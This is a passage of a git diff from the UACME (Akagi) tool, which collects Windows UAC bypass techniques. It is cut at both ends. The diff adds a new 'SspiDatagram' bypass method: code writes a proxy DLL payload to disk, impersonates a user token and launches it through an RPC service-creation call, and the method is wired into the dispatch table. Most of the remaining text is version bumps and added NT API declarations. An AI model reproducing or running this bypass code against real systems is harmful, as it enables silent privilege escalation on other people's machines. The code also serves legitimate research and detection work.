_strcat(szLoaderFileName, TEXT(".exe")); + + bNeedCleanup = supWriteBufferToFile(szLoaderFileName, ProxyDll, ProxyDllSize); + if (!bNeedCleanup) + break; + + if (ImpersonateLoggedOnUser(hToken)) { + + if (ucmxInvokeCreateSvcRpcMain(szLoaderFileName)) + MethodResult = STATUS_SUCCESS; + + RevertToSelf(); + } + + } while (FALSE); + + if (hToken) + CloseHandle(hToken); + + if (bNeedCleanup) + DeleteFile(szLoaderFileName); + + return MethodResult; +} diff --git a/Source/Akagi/methods/azagarampur.c b/Source/Akagi/methods/azagarampur.c index 8bb63d9..46dc511 100644 --- a/Source/Akagi/methods/azagarampur.c +++ b/Source/Akagi/methods/azagarampur.c @@ -4,9 +4,9 @@ * * TITLE: AZAGARAMPUR.C * -* VERSION: 3.64 +* VERSION: 3.65 * -* DATE: 04 Feb 2023 +* DATE: 22 Sep 2023 * * UAC bypass methods from AzAgarampur. * @@ -1497,7 +1497,7 @@ BOOL ucmxExamineTaskhost( * */ BOOL CALLBACK ucmxEnumTaskhost( - _In_ PSYSTEM_PROCESSES_INFORMATION ProcessEntry, + _In_ PSYSTEM_PROCESS_INFORMATION ProcessEntry, _In_ PVOID UserContext ) { diff --git a/Source/Akagi/methods/methods.c b/Source/Akagi/methods/methods.c index 7653705..c5c4eab 100644 --- a/Source/Akagi/methods/methods.c +++ b/Source/Akagi/methods/methods.c @@ -4,9 +4,9 @@ * * TITLE: METHODS.C * -* VERSION: 3.64 +* VERSION: 3.65 * -* DATE: 15 Feb 2023 +* DATE: 22 Sep 2023 * * UAC bypass dispatch. * @@ -51,6 +51,7 @@ UCM_API(MethodVFServerTaskSched); UCM_API(MethodVFServerDiagProf); UCM_API(MethodIscsiCpl); UCM_API(MethodAtlHijack); +UCM_API(MethodSspiDatagram); ULONG UCM_WIN32_NOT_IMPLEMENTED[] = { UacMethodWow64Logger, @@ -146,7 +147,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = { { MethodVFServerTaskSched, { NT_WIN8_BLUE, MAXDWORD}, AKATSUKI_ID, FALSE, TRUE, TRUE }, { MethodVFServerDiagProf, { NT_WIN7_RTM, MAXDWORD}, AKATSUKI_ID, FALSE, TRUE, TRUE }, { MethodIscsiCpl, { NT_WIN7_RTM, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE }, - { MethodAtlHijack, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE } + { MethodAtlHijack, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, + { MethodSspiDatagram, { NT_WIN7_RTM, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE } }; /* @@ -828,3 +830,10 @@ UCM_API(MethodAtlHijack) Parameter->PayloadCode, Parameter->PayloadSize); } + +UCM_API(MethodSspiDatagram) +{ + return ucmSspiDatagramMethod( + Parameter->PayloadCode, + Parameter->PayloadSize); +} diff --git a/Source/Akagi/methods/methods.h b/Source/Akagi/methods/methods.h index d418c99..c2ab2e9 100644 --- a/Source/Akagi/methods/methods.h +++ b/Source/Akagi/methods/methods.h @@ -4,9 +4,9 @@ * * TITLE: METHODS.H * -* VERSION: 3.64 +* VERSION: 3.65 * -* DATE: 04 Feb 2023 +* DATE: 22 Sep 2023 * * Prototypes and definitions for UAC bypass methods table. * @@ -97,6 +97,7 @@ typedef enum _UCM_METHOD { UacMethodVFServerDiagProf, //+ UacMethodIscsiCpl, //+ UacMethodAtlHijack, //+ + UacMethodSspiDatagram, //+ UacMethodMax, UacMethodInvalid = 0xabcdef } UCM_METHOD; diff --git a/Source/Akagi/methods/routines.h b/Source/Akagi/methods/routines.h index 6bd03a4..0a2a2b5 100644 --- a/Source/Akagi/methods/routines.h +++ b/Source/Akagi/methods/routines.h @@ -4,9 +4,9 @@ * * TITLE: ROUTINES.H * -* VERSION: 3.64 +* VERSION: 3.65 * -* DATE: 04 Feb 2023 +* DATE: 22 Sep 2023 * * Prototypes of methods for UAC bypass methods table. * @@ -171,6 +171,10 @@ NTSTATUS ucmAtlHijackMethod( _In_ PVOID ProxyDll, _In_ DWORD ProxyDllSize); +NTSTATUS ucmSspiDatagramMethod( + _In_ PVOID ProxyDll, + _In_ DWORD ProxyDllSize); + // // Post execution cleanup routines. // diff --git a/Source/Akagi/sup.c b/Source/Akagi/sup.c index c2de41d..6ef1a39 100644 --- a/Source/Akagi/sup.c +++ b/Source/Akagi/sup.c @@ -4,9 +4,9 @@ * * TITLE: SUP.C * -* VERSION: 3.64 +* VERSION: 3.65 * -* DATE: 24 Jun 2023 +* DATE: 22 Sep 2023 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED @@ -2711,7 +2711,7 @@ BOOL supIsProcessRunning( UNICODE_STRING lookupPsName; union { - PSYSTEM_PROCESSES_INFORMATION Processes; + PSYSTEM_PROCESS_INFORMATION Processes; PBYTE ListRef; } List; @@ -4035,7 +4035,7 @@ BOOL supEnumProcessesForSession( PVOID processList; union { - PSYSTEM_PROCESSES_INFORMATION Processes; + PSYSTEM_PROCESS_INFORMATION Processes; PBYTE ListRef; } List; @@ -4169,7 +4169,7 @@ ULONG supWaitForChildProcesses( UNICODE_STRING lookupPsName; union { - PSYSTEM_PROCESSES_INFORMATION Processes; + PSYSTEM_PROCESS_INFORMATION Processes; PBYTE ListRef; } List; @@ -4299,3 +4299,77 @@ VOID supRaiseHardError( (PULONG)&heResponse); } } + +/* +* supGetThreadTokenImpersonationLevel +* +* Purpose: +* +* Query thread token impersonation level. +* +*/ +BOOL supGetThreadTokenImpersonationLevel( + _In_ HANDLE ThreadHandle, + _Out_ PSECURITY_IMPERSONATION_LEVEL ImpersonationLevel) +{ + ULONG dummy; + HANDLE hToken = NULL; + SECURITY_IMPERSONATION_LEVEL level = SecurityAnonymous; + NTSTATUS ntStatus; + + ntStatus = NtOpenThreadToken(ThreadHandle, + MAXIMUM_ALLOWED, + TRUE, + &hToken); + + if (NT_SUCCESS(ntStatus)) { + + ntStatus = NtQueryInformationToken(hToken, + TokenImpersonationLevel, + (PVOID)&level, + sizeof(SECURITY_IMPERSONATION_LEVEL), + &dummy); + + NtClose(hToken); + } + + *ImpersonationLevel = level; + return NT_SUCCESS(ntStatus); +} + +/* +* supGetTickCount64 +* +* Purpose: +* +* GetTickCount64 eqv. +* +*/ +ULONGLONG supGetTickCount64( + VOID +) +{ + ULARGE_INTEGER tickCount; + +#ifdef _WIN64 + + tickCount.QuadPart = USER_SHARED_DATA->TickCountQuad; + +#else + + while (TRUE) + { + tickCount.HighPart = (ULONG)USER_SHARED_DATA->TickCount.High1Time; + tickCount.LowPart = USER_SHARED_DATA->TickCount.LowPart; + + if (tickCount.HighPart == (ULONG)USER_SHARED_DATA->TickCount.High2Time) + break; + + NtYieldExecution(); + } + +#endif + + return (UInt32x32To64(tickCount.LowPart, USER_SHARED_DATA->TickCountMultiplier) >> 24) + + (UInt32x32To64(tickCount.HighPart, USER_SHARED_DATA->TickCountMultiplier) << 8); +} diff --git a/Source/Akagi/sup.h b/Source/Akagi/sup.h index 754b0d4..a6c60d4 100644 --- a/Source/Akagi/sup.h +++ b/Source/Akagi/sup.h @@ -4,9 +4,9 @@ * * TITLE: SUP.H * -* VERSION: 3.64 +* VERSION: 3.65 * -* DATE: 15 Feb 2023 +* DATE: 22 Sep 2023 * * Common header file for the program support routines. * @@ -453,7 +453,7 @@ BOOL supConcatenatePaths( _In_ SIZE_T TargetBufferSize); typedef BOOL(CALLBACK* pfnEnumProcessCallback)( - _In_ PSYSTEM_PROCESSES_INFORMATION ProcessEntry, + _In_ PSYSTEM_PROCESS_INFORMATION ProcessEntry, _In_opt_ PVOID UserContext ); @@ -476,6 +476,13 @@ ULONG supWaitForChildProcesses( VOID supRaiseHardError( _In_ NTSTATUS HardErrorStatus); +BOOL supGetThreadTokenImpersonationLevel( + _In_ HANDLE ThreadHandle, + _Out_ PSECURITY_IMPERSONATION_LEVEL ImpersonationLevel); + +ULONGLONG supGetTickCount64( + VOID); + #ifdef _DEBUG #define supDbgMsg(Message) OutputDebugString(Message) #else diff --git a/Source/Akagi/uacme.vcxproj b/Source/Akagi/uacme.vcxproj index 9586d06..5327d17 100644 --- a/Source/Akagi/uacme.vcxproj +++ b/Source/Akagi/uacme.vcxproj @@ -651,6 +651,7 @@ + diff --git a/Source/Akagi/uacme.vcxproj.filters b/Source/Akagi/uacme.vcxproj.filters index 374a504..cccf6c4 100644 --- a/Source/Akagi/uacme.vcxproj.filters +++ b/Source/Akagi/uacme.vcxproj.filters @@ -183,6 +183,9 @@ Source Files + + Source Files\methods + diff --git a/Source/Akagi/uacme.vcxproj.user b/Source/Akagi/uacme.vcxproj.user index 6e081ec..684d4b5 100644 --- a/Source/Akagi/uacme.vcxproj.user +++ b/Source/Akagi/uacme.vcxproj.user @@ -15,16 +15,15 @@ WindowsLocalDebugger - - + 78 WindowsLocalDebugger - 77 + 78 WindowsLocalDebugger - 75 + 78 WindowsLocalDebugger @@ -36,11 +35,11 @@ WindowsLocalDebugger - 75 + 78 WindowsLocalDebugger - 34 + 78 WindowsLocalDebugger \ No newline at end of file diff --git a/Source/Akatsuki/version.rc b/Source/Akatsuki/version.rc index 47d72be3774f4dac5ad737bd9b90ed2ff52e2932..bd2e958655c739df4ed0508bbcf4a32a56957e06 100644 GIT binary patch delta 213 zcmeyRd`4x%Bo1y<1|0??24e;T2FuBFIdoC@@|=>J-*J3lRCQx0Vn}2tWk_Kt2hv3h zsSFAX!3@bjRwhFMLkW<~V@RKTkym{318%X&Qrt^`#^}L~g@_+;H3sS;$|RtZKq_+> f^1(JF0!>$72mI$ diff --git a/Source/Fubuki/version.rc b/Source/Fubuki/version.rc index d7fd821fff77391692fd6152dd5b43b12ded0698..701675f0e760680b2240eafb5854a139787629e0 100644 GIT binary patch delta 81 zcmdm{vQ1^fBo1y<1|0??24e;T2FuBFIdoC@@|=>J-*Mbw0t)KE73uQmE@t9E5!=km Hr^x~UzEBTR delta 81 zcmdm{vQ1^fBo1y91|0??24e;T2BXPyIdoC@@|=>J-*Mbw0t)KE73uQmE@t9E5!=km Hr^x~UxwsE9 diff --git a/Source/Shared/consts.h b/Source/Shared/consts.h index b944c95..678bc0a 100644 --- a/Source/Shared/consts.h +++ b/Source/Shared/consts.h @@ -4,9 +4,9 @@ * * TITLE: CONSTS.H * -* VERSION: 3.64 +* VERSION: 3.65 * -* DATE: 04 Feb 2023 +* DATE: 22 Sep 2023 * * Global consts definition file. * @@ -29,8 +29,8 @@ #define UCM_VERSION_MAJOR 3 #define UCM_VERSION_MINOR 6 -#define UCM_VERSION_REVISION 4 -#define UCM_VERSION_BUILD 2302 +#define UCM_VERSION_REVISION 5 +#define UCM_VERSION_BUILD 2309 #define SUPRUNPROCESS_TIMEOUT_DEFAULT 12000 @@ -50,6 +50,7 @@ #define AKAGI_COMPLETION_EVENT_ID 'ab' #define AKAGI_SHARED_SECTION_ID 'cd' #define AKAGI_BDESCRIPTOR_NAME_ID 'ef' +#define AKAGI_RPC_SVC 'zz' #define FUBUKI_SYNC_MUTEX_ID 'a1' #define FUBUKI_PCA_SECTION_ID '0f' #define FUBUKI_PCA_EVENT_ID '1f' diff --git a/Source/Shared/ntos/ntbuilds.h b/Source/Shared/ntos/ntbuilds.h index dbe80e5..f92204d 100644 --- a/Source/Shared/ntos/ntbuilds.h +++ b/Source/Shared/ntos/ntbuilds.h @@ -4,9 +4,9 @@ * * TITLE: NTBUILDS.H * -* VERSION: 1.16 +* VERSION: 1.18 * -* DATE: 15 May 2023 +* DATE: 21 Jul 2023 * * Windows NT builds definition file. * @@ -85,6 +85,6 @@ // Windows 11 22H2 #define NT_WIN11_22H2 22621 -// Windows 11 Active Develepment Branch (23H2) -#define NTX_WIN11_ADB_DEV 23451 -#define NTX_WIN11_ADB 25351 //canary +// Windows 11 Active Develepment Branch +#define NT_WIN11_23H2 22631 +#define NT_WIN11_24H2 25905 //canary (24H2) diff --git a/Source/Shared/ntos/ntos.h b/Source/Shared/ntos/ntos.h index 8cb9651..90b860b 100644 --- a/Source/Shared/ntos/ntos.h +++ b/Source/Shared/ntos/ntos.h @@ -5,9 +5,9 @@ * * TITLE: NTOS.H * -* VERSION: 1.212 +* VERSION: 1.219 * -* DATE: 22 Jun 2023 +* DATE: 21 Jul 2023 * * Common header file for the ntos API functions and definitions. * @@ -182,6 +182,12 @@ typedef PVOID PMEM_EXTENDED_PARAMETER; #define NtCurrentThreadToken() ((HANDLE)(LONG_PTR)-5) #define NtCurrentThreadEffectiveToken() ((HANDLE)(LONG_PTR)-6) //GetCurrentThreadEffectiveToken +enum _KPROCESSOR_MODE { + KernelMode = 0, + UserMode, + MaximumMode +}; + // // ntdef.h begin // @@ -739,12 +745,13 @@ typedef struct _SYSTEM_EXTENDED_THREAD_INFORMATION { ULONG_PTR Reserved4; } SYSTEM_EXTENDED_THREAD_INFORMATION, *PSYSTEM_EXTENDED_THREAD_INFORMATION; -typedef struct _SYSTEM_PROCESSES_INFORMATION { +typedef struct _SYSTEM_PROCESS_INFORMATION { ULONG NextEntryDelta; ULONG ThreadCount; - LARGE_INTEGER SpareLi1; - LARGE_INTEGER SpareLi2; - LARGE_INTEGER SpareLi3; + LARGE_INTEGER WorkingSetPrivateSize; + ULONG HardFaultCount; + ULONG NumberOfThreadsHighWatermark; + ULONGLONG CycleTime; LARGE_INTEGER CreateTime; LARGE_INTEGER UserTime; LARGE_INTEGER KernelTime; @@ -754,11 +761,11 @@ typedef struct _SYSTEM_PROCESSES_INFORMATION { HANDLE InheritedFromUniqueProcessId; ULONG HandleCount; ULONG SessionId; - ULONG_PTR PageDirectoryBase; + ULONG_PTR UniqueProcessKey; VM_COUNTERS VmCounters; IO_COUNTERS IoCounters; - SYSTEM_THREAD_INFORMATION Threads[1]; -} SYSTEM_PROCESSES_INFORMATION, *PSYSTEM_PROCESSES_INFORMATION; + SYSTEM_THREAD_INFORMATION Threads[1]; //not a part of this structure +} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION; typedef enum _SYSTEM_PROCESS_CLASSIFICATION { SystemProcessClassificationNormal, @@ -837,10 +844,10 @@ typedef struct _SYSTEM_PROCESS_INFORMATION_EXTENSION { ULONGLONG ProcessSequenceNumber; } SYSTEM_PROCESS_INFORMATION_EXTENSION, *PSYSTEM_PROCESS_INFORMATION_EXTENSION; -typedef struct _SYSTEM_PROCESSES_FULL_INFORMATION { - SYSTEM_PROCESSES_INFORMATION ProcessAndThreads; +typedef struct _SYSTEM_PROCESS_FULL_INFORMATION { + SYSTEM_PROCESS_INFORMATION ProcessAndThreads; SYSTEM_PROCESS_INFORMATION_EXTENSION ExtendedInfo; -} SYSTEM_PROCESSES_FULL_INFORMATION, *PSYSTEM_PROCESSES_FULL_INFORMATION; +} SYSTEM_PROCESS_FULL_INFORMATION, *PSYSTEM_PROCESS_FULL_INFORMATION; typedef struct _SYSTEM_PROCESS_ID_INFORMATION { HANDLE ProcessId; @@ -962,6 +969,10 @@ typedef struct _SYSTEM_BIGPOOL_INFORMATION { SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1]; } SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION; +typedef struct _SYSTEM_FIRMWARE_PARTITION_INFORMATION { + UNICODE_STRING FirmwarePartition; // \Device\HarddiskX +} SYSTEM_FIRMWARE_PARTITION_INFORMATION, * PSYSTEM_FIRMWARE_PARTITION_INFORMATION; + typedef struct _RTL_PROCESS_BACKTRACE_INFORMATION { PCHAR SymbolicBackTrace; ULONG TraceCount; @@ -1028,7 +1039,7 @@ typedef enum _PROCESSINFOCLASS { ProcessMemoryAllocationMode = 46, ProcessGroupInformation = 47, ProcessTokenVirtualizationEnabled = 48, - ProcessOwnerInformation = 49, + ProcessConsoleHostProcess = 49, //ProcessOwnerInformation ProcessWindowInformation = 50, ProcessHandleInformation = 51, ProcessMitigationPolicy = 52, @@ -1226,8 +1237,8 @@ typedef struct _PROCESS_HANDLE_TABLE_ENTRY_INFO { } PROCESS_HANDLE_TABLE_ENTRY_INFO, *PPROCESS_HANDLE_TABLE_ENTRY_INFO; typedef struct _PROCESS_HANDLE_SNAPSHOT_INFORMATION { - ULONG NumberOfHandles; - ULONG Reserved; + ULONG_PTR NumberOfHandles; + ULONG_PTR Reserved; PROCESS_HANDLE_TABLE_ENTRY_INFO Handles[1]; } PROCESS_HANDLE_SNAPSHOT_INFORMATION, *PPROCESS_HANDLE_SNAPSHOT_INFORMATION; @@ -1605,6 +1616,12 @@ typedef struct _PROCESS_WS_WATCH_INFORMATION_EX { ULONG_PTR Flags; } PROCESS_WS_WATCH_INFORMATION_EX, * PPROCESS_WS_WATCH_INFORMATION_EX; +typedef struct _PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION { + ULONG Version; + ULONG Reserved; + PVOID Callback; +} PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION, * PPROCESS_INSTRUMENTATION_CALLBACK_INFORMATION; + /* ** Processes END */ @@ -1849,6 +1866,14 @@ typedef enum _SYSTEM_INFORMATION_CLASS { SystemPointerAuthInformation = 236, SystemSecureKernelDebuggerInformation = 237, SystemOriginalImageFeatureInformation = 238, + SystemMemoryNumaInformation = 239, + SystemMemoryNumaPerformanceInformation = 240, + SystemCodeIntegritySignedPoliciesFullInformation = 241, + SystemSecureSecretsInformation = 242, + SystemTrustedAppsRuntimeInformation = 243, + SystemBadPageInformationEx = 244, + SystemResourceDeadlockTimeout = 245, + SystemBreakOnContextUnwindFailureInformation = 246, MaxSystemInfoClass } SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS; @@ -2220,6 +2245,12 @@ typedef enum _FILE_INFORMATION_CLASS { FileStorageReserveIdInformation, FileCaseSensitiveInformationForceAccessCheck, FileKnownFolderInformation, + FileStatBasicInformation, + FileId64ExtdDirectoryInformation, + FileId64ExtdBothDirectoryInformation, + FileIdAllExtdDirectoryInformation, + FileIdAllExtdBothDirectoryInformation, + FileStreamReservationInformation, FileMaximumInformation } FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS; @@ -2238,6 +2269,7 @@ typedef enum _FSINFOCLASS { FileFsDataCopyInformation, FileFsMetadataSizeInformation, FileFsFullSizeInformationEx, + FileFsGuidInformation, FileFsMaximumInformation } FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS; @@ -4553,6 +4585,20 @@ typedef struct _DRIVER_EXTENSION_V4 { PVOID VerifierContext; } DRIVER_EXTENSION_V4, * PDRIVER_EXTENSION_V4; +// Private, since 11 25XXX +typedef struct _DRIVER_EXTENSION_V5 { + struct _DRIVER_OBJECT* DriverObject; + PVOID AddDevice; + ULONG Count; + UNICODE_STRING ServiceKeyName; + struct _IO_CLIENT_EXTENSION* ClientDriverExtension; + struct _FS_FILTER_CALLBACKS* FsFilterCallbacks; + PVOID KseCallbacks; //KernelShimEngine + PVOID DvCallbacks; //DriverVerifier + PVOID VerifierContext; + struct _DRIVER_PROXY_EXTENSION* DriverProxyExtension; +} DRIVER_EXTENSION_V5, * PDRIVER_EXTENSION_V5; /* size: 0x0058 */ + #define DRVO_UNLOAD_INVOKED 0x00000001 #define DRVO_LEGACY_DRIVER 0x00000002 #define DRVO_BUILTIN_DRIVER 0x00000004 // Driver objects for Hal, PnP Mgr @@ -5773,8 +5819,6 @@ typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE]; #define RTL_MAX_DRIVE_LETTERS 32 #define RTL_DRIVE_LETTER_VALID (USHORT)0x0001 -#define GDI_MAX_HANDLE_COUNT 0x4000 //0xFFFF - // 32-bit definitions typedef struct _STRING32 { USHORT Length; @@ -6102,32 +6146,6 @@ typedef struct _PEB_LDR_DATA { HANDLE ShutdownThreadId; } PEB_LDR_DATA, *PPEB_LDR_DATA; -typedef struct _GDI_HANDLE_ENTRY { - union - { - PVOID Object; - PVOID NextFree; - }; - union - { - struct - { - USHORT ProcessId; - USHORT Lock : 1; - USHORT Count : 15; - }; - ULONG Value; - } Owner; - USHORT Unique; - UCHAR Type; - UCHAR Flags; - PVOID UserPointer; -} GDI_HANDLE_ENTRY, *PGDI_HANDLE_ENTRY; - -typedef struct _GDI_SHARED_MEMORY { - GDI_HANDLE_ENTRY Handles[GDI_MAX_HANDLE_COUNT]; -} GDI_SHARED_MEMORY, *PGDI_SHARED_MEMORY; - #ifndef FLS_MAXIMUM_AVAILABLE #define FLS_MAXIMUM_AVAILABLE 128 #endif @@ -6815,7 +6833,9 @@ typedef struct tagPROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 { struct { DWORD DisallowWin32kSystemCalls : 1; DWORD AuditDisallowWin32kSystemCalls : 1; - DWORD ReservedFlags : 30; + DWORD DisallowFsctlSystemCalls : 1; + DWORD AuditDisallowFsctlSystemCalls : 1; + DWORD ReservedFlags : 28; } DUMMYSTRUCTNAME; } DUMMYUNIONNAME; } PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10, *PPROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10; @@ -8462,46 +8482,6 @@ LdrControlFlowGuardEnforced( ** LDR END */ -/* -* WIN32K OBJECTS START -*/ - -typedef struct _HANDLEENTRY { - PHEAD phead; // Pointer to the Object. - PVOID pOwner; // PTI or PPI - BYTE bType; // Object handle type - BYTE bFlags; // Flags - WORD wUniq; // Access count. -} HANDLEENTRY, *PHANDLEENTRY; - -typedef struct _SERVERINFO { - WORD wRIPFlags; - WORD wSRVIFlags; - WORD wRIPPID; - WORD wRIPError; - ULONG cHandleEntries; - // incomplete -} SERVERINFO, *PSERVERINFO; - -typedef struct _SHAREDINFO { - PSERVERINFO psi; - PHANDLEENTRY aheList; - ULONG HeEntrySize; - // incomplete -} SHAREDINFO, *PSHAREDINFO; - -typedef struct _USERCONNECT { - ULONG ulVersion; - ULONG ulCurrentVersion; - DWORD dwDispatchCount; - SHAREDINFO siClient; -} USERCONNECT, *PUSERCONNECT; - -/* -* WIN32K OBJECTS END -*/ - - /* ** Runtime Library API START */ @@ -8544,6 +8524,20 @@ CsrClientConnectToServer( (_ucStr)->MaximumLength = (USHORT)(_bufSize)) #endif +FORCEINLINE +VOID +NTAPI +RtlInitEmptyAnsiString( + _Out_ PANSI_STRING AnsiString, + _Pre_maybenull_ _Pre_readable_size_(MaximumLength) PCHAR Buffer, + _In_ USHORT MaximumLength +) +{ + memset(AnsiString, 0, sizeof(ANSI_STRING)); + AnsiString->MaximumLength = MaximumLength; + AnsiString->Buffer = Buffer; +} + NTSYSAPI BOOLEAN NTAPI @@ -9355,7 +9349,7 @@ NtRaiseException( _In_ BOOLEAN FirstChance); __analysis_noreturn -NTSYSCALLAPI +NTSYSAPI VOID NTAPI RtlAssert( @@ -9373,6 +9367,22 @@ RtlAssert( #define RTL_SOFT_ASSERTMSG(_msg, _exp) \ ((!(_exp)) ? (DbgPrint("%s(%d): Soft assertion failed\n Expression: %s\n Message: %s\n", __FILE__, __LINE__, #_exp, (_msg)), FALSE) : TRUE) +typedef ULONG(NTAPI* PRTLP_UNHANDLED_EXCEPTION_FILTER)( + _In_ PEXCEPTION_POINTERS ExceptionInfo + ); + +NTSYSAPI +VOID +NTAPI +RtlSetUnhandledExceptionFilter( + _In_ PRTLP_UNHANDLED_EXCEPTION_FILTER UnhandledExceptionFilter); + +NTSYSAPI +LONG +NTAPI +RtlUnhandledExceptionFilter( + _In_ PEXCEPTION_POINTERS ExceptionPointers); + /************************************************************************************ * * RTL Security API. @@ -9932,6 +9942,32 @@ RtlAdjustPrivilege( _In_ BOOLEAN Client, _Out_ PBOOLEAN WasEnabled); +#define RTL_ACQUIRE_PRIVILEGE_REVERT 0x00000001 +#define RTL_ACQUIRE_PRIVILEGE_PROCESS 0x00000002 + +NTSYSAPI +NTSTATUS +NTAPI +RtlAcquirePrivilege( + _In_ PULONG Privilege, + _In_ ULONG NumPriv, + _In_ ULONG Flags, + _Out_ PVOID* ReturnedState); + +NTSYSAPI +VOID +NTAPI +RtlReleasePrivilege( + _In_ PVOID StatePointer); + +NTSYSAPI +NTSTATUS +NTAPI +RtlRemovePrivileges( + _In_ HANDLE TokenHandle, + _In_ PULONG PrivilegesToKeep, + _In_ ULONG PrivilegeCount); + NTSYSAPI BOOLEAN NTAPI @@ -14430,6 +14466,114 @@ NtSetIntervalProfile( _In_ ULONG Interval, _In_ KPROFILE_SOURCE Source); +/************************************************************************************ +* +* Signing Levels API. +* +************************************************************************************/ +typedef UCHAR SE_SIGNING_LEVEL, * PSE_SIGNING_LEVEL; + +#ifndef SE_SIGNING_LEVEL_UNCHECKED +#define SE_SIGNING_LEVEL_UNCHECKED 0x00000000 +#endif + +#ifndef SE_SIGNING_LEVEL_UNSIGNED +#define SE_SIGNING_LEVEL_UNSIGNED 0x00000001 +#endif + +#ifndef SE_SIGNING_LEVEL_ENTERPRISE +#define SE_SIGNING_LEVEL_ENTERPRISE 0x00000002 +#endif + +#ifndef SE_SIGNING_LEVEL_CUSTOM_1 +#define SE_SIGNING_LEVEL_CUSTOM_1 0x00000003 +#endif + +#ifndef SE_SIGNING_LEVEL_DEVELOPER +#define SE_SIGNING_LEVEL_DEVELOPER SE_SIGNING_LEVEL_CUSTOM_1 +#endif + +#ifndef SE_SIGNING_LEVEL_AUTHENTICODE +#define SE_SIGNING_LEVEL_AUTHENTICODE 0x00000004 +#endif + +#ifndef SE_SIGNING_LEVEL_CUSTOM_2 +#define SE_SIGNING_LEVEL_CUSTOM_2 0x00000005 +#endif + +#ifndef SE_SIGNING_LEVEL_STORE +#define SE_SIGNING_LEVEL_STORE 0x00000006 +#endif + +#ifndef SE_SIGNING_LEVEL_CUSTOM_3 +#define SE_SIGNING_LEVEL_CUSTOM_3 0x00000007 +#endif + +#ifndef SE_SIGNING_LEVEL_ANTIMALWARE +#define SE_SIGNING_LEVEL_ANTIMALWARE SE_SIGNING_LEVEL_CUSTOM_3 +#endif + +#ifndef SE_SIGNING_LEVEL_MICROSOFT +#define SE_SIGNING_LEVEL_MICROSOFT 0x00000008 +#endif + +#ifndef SE_SIGNING_LEVEL_CUSTOM_4 +#define SE_SIGNING_LEVEL_CUSTOM_4 0x00000009 +#endif + +#ifndef SE_SIGNING_LEVEL_CUSTOM_5 +#define SE_SIGNING_LEVEL_CUSTOM_5 0x0000000A +#endif + +#ifndef SE_SIGNING_LEVEL_DYNAMIC_CODEGEN +#define SE_SIGNING_LEVEL_DYNAMIC_CODEGEN 0x0000000B +#endif + +#ifndef SE_SIGNING_LEVEL_WINDOWS +#define SE_SIGNING_LEVEL_WINDOWS 0x0000000C +#endif + +#ifndef SE_SIGNING_LEVEL_CUSTOM_7 +#define SE_SIGNING_LEVEL_CUSTOM_7 0x0000000D +#endif + +#ifndef SE_SIGNING_LEVEL_WINDOWS_TCB +#define SE_SIGNING_LEVEL_WINDOWS_TCB 0x0000000E +#endif + +#ifndef SE_SIGNING_LEVEL_CUSTOM_6 +#define SE_SIGNING_LEVEL_CUSTOM_6 0x0000000F +#endif + +NTSYSAPI +NTSTATUS +NTAPI +NtSetCachedSigningLevel( + _In_ ULONG Flags, + _In_ SE_SIGNING_LEVEL InputSigningLevel, + _In_reads_(SourceFileCount) PHANDLE SourceFiles, + _In_ ULONG SourceFileCount, + _In_opt_ HANDLE TargetFile); + +NTSYSAPI +NTSTATUS +NTAPI +NtGetCachedSigningLevel( + _In_ HANDLE File, + _Out_ PULONG Flags, + _Out_ PSE_SIGNING_LEVEL SigningLevel, + _Out_writes_bytes_to_opt_(*ThumbprintSize, *ThumbprintSize) PUCHAR Thumbprint, + _Inout_opt_ PULONG ThumbprintSize, + _Out_opt_ PULONG ThumbprintAlgorithm); + +//REDSTONE 2 and above +NTSYSAPI +NTSTATUS +NTAPI +NtCompareSigningLevels( + _In_ SE_SIGNING_LEVEL FirstSigningLevel, + _In_ SE_SIGNING_LEVEL SecondSigningLevel); + /************************************************************************************ * * Worker Factory API. @@ -14811,6 +14955,53 @@ NtRaiseHardError( _In_ ULONG ValidResponseOptions, _Out_ PULONG Response); +/************************************************************************************ +* +* Thread Pooling API and definitions. +* +************************************************************************************/ + +NTSYSAPI +NTSTATUS +NTAPI +TpAllocPool( + _Out_ PTP_POOL* PoolReturn, + _Reserved_ PVOID Reserved); + +NTSYSAPI +VOID +NTAPI +TpReleasePool( + _Inout_ PTP_POOL Pool); + +NTSYSAPI +NTSTATUS +NTAPI +TpAllocWork( + _Out_ PTP_WORK* WorkReturn, + _In_ PTP_WORK_CALLBACK Callback, + _Inout_opt_ PVOID Context, + _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron); + +NTSYSAPI +VOID +NTAPI +TpReleaseWork( + _Inout_ PTP_WORK Work); + +NTSYSAPI +VOID +NTAPI +TpPostWork( + _Inout_ PTP_WORK Work); + +NTSYSAPI +VOID +NTAPI +TpWaitForWork( + _Inout_ PTP_WORK Work, + _In_ LOGICAL CancelPendingCallbacks); + /************************************************************************************ * * Application Verifier API and definitions. diff --git a/Source/Shared/util.c b/Source/Shared/util.c index a7dd211..eb990e0 100644 --- a/Source/Shared/util.c +++ b/Source/Shared/util.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2017 - 2021 +* (C) COPYRIGHT AUTHORS, 2017 - 2023 * * TITLE: UTIL.C * -* VERSION: 3.56 +* VERSION: 3.65 * -* DATE: 17 July 2021 +* DATE: 22 Sep 2023 * * Global support routines file shared between payload 